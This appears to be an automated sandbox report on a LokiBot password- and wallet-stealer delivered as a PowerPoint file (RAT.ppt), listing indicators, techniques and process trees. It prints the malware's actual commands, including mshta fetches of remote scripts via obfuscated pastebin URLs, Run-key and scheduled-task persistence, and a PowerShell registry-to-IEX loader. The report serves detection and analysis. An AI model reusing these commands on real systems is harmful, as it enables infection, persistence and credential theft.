lokibot | 20b52843f8e11a925f7008ffe96848e846099130c0c23bd80b3f3c6ee726e234

Analysis

max time kernel
139s
max time network
145s
platform
windows7_x64
resource
win7v200722
submitted
18-08-2020 09:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RAT.ppt
Size

87KB
MD5

996d8c68ecfe98a2ce25c177927a90e0
SHA1

538d30afcc2d003f95c5f82714134957c8957159
SHA256

20b52843f8e11a925f7008ffe96848e846099130c0c23bd80b3f3c6ee726e234
SHA512

b9f2f992227632b86bcf2aad781738c2be173610bd41359fc581a89c7e4b44cac714385d28f7c967be2a31e8a3c33132aa6d5ced071d41c47aaa1f6c415cff1e

Score

10^/10

lokibot persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/aKjCtLDg

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/1448-34-0x0000000002750000-0x0000000002757000-memory.dmp	disable_win_def

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	268	108	mshta.exe	23
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1492	1680	powershell.exe	34
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1448	1680	powershell.exe	34

Blocklisted process makes network request 9 IoCs

flow	pid	Process
5	268	mshta.exe
7	268	mshta.exe
9	268	mshta.exe
11	268	mshta.exe
14	1964	mshta.exe
15	2032	mshta.exe
16	1448	powershell.exe
21	1492	powershell.exe
23	1492	powershell.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\sgnittes = "\"mshta\"\"https://%50%50%50%50%50%50%50%[email protected]\\raw\\A1scmntK\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"https://%50%50%50%50%50%50%50%[email protected]\\raw\\MceaAVSv\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\warfed = "\"mshta\"\"https://%50%50%50%50%50%50%50%[email protected]\\raw\\CkLFEYsw\""	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Windows\CurrentVersion\Run\koaskd = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Fucku)\|IEX\"\", 0 : window.close\")"	mshta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1184	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493469-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493483-5A91-11CF-8700-00AA0060263B}\ = "ThreeDFormat"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A6A-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A79-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493476-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934D6-5A91-11CF-8700-00AA0060263B}\ = "Designs"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934E5-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9149348D-5A91-11CF-8700-00AA0060263B}\ = "ActionSetting"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934E5-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A6C-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "Interior"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A74-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A75-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BA72E55A-4FF5-48F4-8215-5505F990966F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9149346F-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493486-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493491-5A91-11CF-8700-00AA0060263B}\ = "RulerLevels"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9149349D-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A65-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493483-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493487-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9149348D-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BA72E558-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A60-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A7C-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9149345C-5A91-11CF-8700-00AA0060263B}\ = "NamedSlideShow"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9149345C-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934E3-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934E9-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A50-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493460-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493483-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934CA-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934F7-5A91-11CF-8700-00AA0060263B}\ = "Research"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A66-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493474-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934EB-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A5E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A66-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A71-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934C6-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934EA-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A51-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493474-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493495-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A5A-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A63-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493461-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{914934CF-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A56-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A5E-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BA72E556-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493466-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{92D41A5E-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BA72E554-4FF5-48F4-8215-5505F990966F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BA72E557-4FF5-48F4-8215-5505F990966F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91493472-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
108	POWERPNT.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1492	powershell.exe
1448	powershell.exe
1492	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeIncreaseQuotaPrivilege	1492	powershell.exe
Token: SeSecurityPrivilege	1492	powershell.exe
Token: SeTakeOwnershipPrivilege	1492	powershell.exe
Token: SeLoadDriverPrivilege	1492	powershell.exe
Token: SeSystemProfilePrivilege	1492	powershell.exe
Token: SeSystemtimePrivilege	1492	powershell.exe
Token: SeProfSingleProcessPrivilege	1492	powershell.exe
Token: SeIncBasePriorityPrivilege	1492	powershell.exe
Token: SeCreatePagefilePrivilege	1492	powershell.exe
Token: SeBackupPrivilege	1492	powershell.exe
Token: SeRestorePrivilege	1492	powershell.exe
Token: SeShutdownPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeSystemEnvironmentPrivilege	1492	powershell.exe
Token: SeRemoteShutdownPrivilege	1492	powershell.exe
Token: SeUndockPrivilege	1492	powershell.exe
Token: SeManageVolumePrivilege	1492	powershell.exe
Token: 33	1492	powershell.exe
Token: 34	1492	powershell.exe
Token: 35	1492	powershell.exe
Token: SeIncreaseQuotaPrivilege	1492	powershell.exe
Token: SeSecurityPrivilege	1492	powershell.exe
Token: SeTakeOwnershipPrivilege	1492	powershell.exe
Token: SeLoadDriverPrivilege	1492	powershell.exe
Token: SeSystemProfilePrivilege	1492	powershell.exe
Token: SeSystemtimePrivilege	1492	powershell.exe
Token: SeProfSingleProcessPrivilege	1492	powershell.exe
Token: SeIncBasePriorityPrivilege	1492	powershell.exe
Token: SeCreatePagefilePrivilege	1492	powershell.exe
Token: SeBackupPrivilege	1492	powershell.exe
Token: SeRestorePrivilege	1492	powershell.exe
Token: SeShutdownPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeSystemEnvironmentPrivilege	1492	powershell.exe
Token: SeRemoteShutdownPrivilege	1492	powershell.exe
Token: SeUndockPrivilege	1492	powershell.exe
Token: SeManageVolumePrivilege	1492	powershell.exe
Token: 33	1492	powershell.exe
Token: 34	1492	powershell.exe
Token: 35	1492	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1448	powershell.exe
1448	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 108 wrote to memory of 268	108	POWERPNT.EXE	27
PID 108 wrote to memory of 268	108	POWERPNT.EXE	27
PID 108 wrote to memory of 268	108	POWERPNT.EXE	27
PID 268 wrote to memory of 1964	268	mshta.exe	30
PID 268 wrote to memory of 1964	268	mshta.exe	30
PID 268 wrote to memory of 1964	268	mshta.exe	30
PID 268 wrote to memory of 1184	268	mshta.exe	31
PID 268 wrote to memory of 1184	268	mshta.exe	31
PID 268 wrote to memory of 1184	268	mshta.exe	31
PID 268 wrote to memory of 2032	268	mshta.exe	32
PID 268 wrote to memory of 2032	268	mshta.exe	32
PID 268 wrote to memory of 2032	268	mshta.exe	32
PID 1448 wrote to memory of 324	1448	powershell.exe	40
PID 1448 wrote to memory of 324	1448	powershell.exe	40
PID 1448 wrote to memory of 324	1448	powershell.exe	40

C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RAT.ppt"
1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:108
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" https://%909123id%909123id%909123id%909123id%[email protected]\kkkasriiiiii2rkoodd
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Windows\System32\mshta.exe
    mshta https://%50%50%50%50%50%50%50%[email protected]\raw\1Kps24Kt
    3⤵
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Modifies Internet Explorer settings
    PID:1964
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%[email protected]\raw\1Kps24Kt
    3⤵
    - Creates scheduled task(s)
    PID:1184
- - C:\Windows\System32\mshta.exe
    mshta https://%50%50%50%50%50%50%50%[email protected]\raw\CkLFEYsw
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ((gp HKCU:\Software).Fucku)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
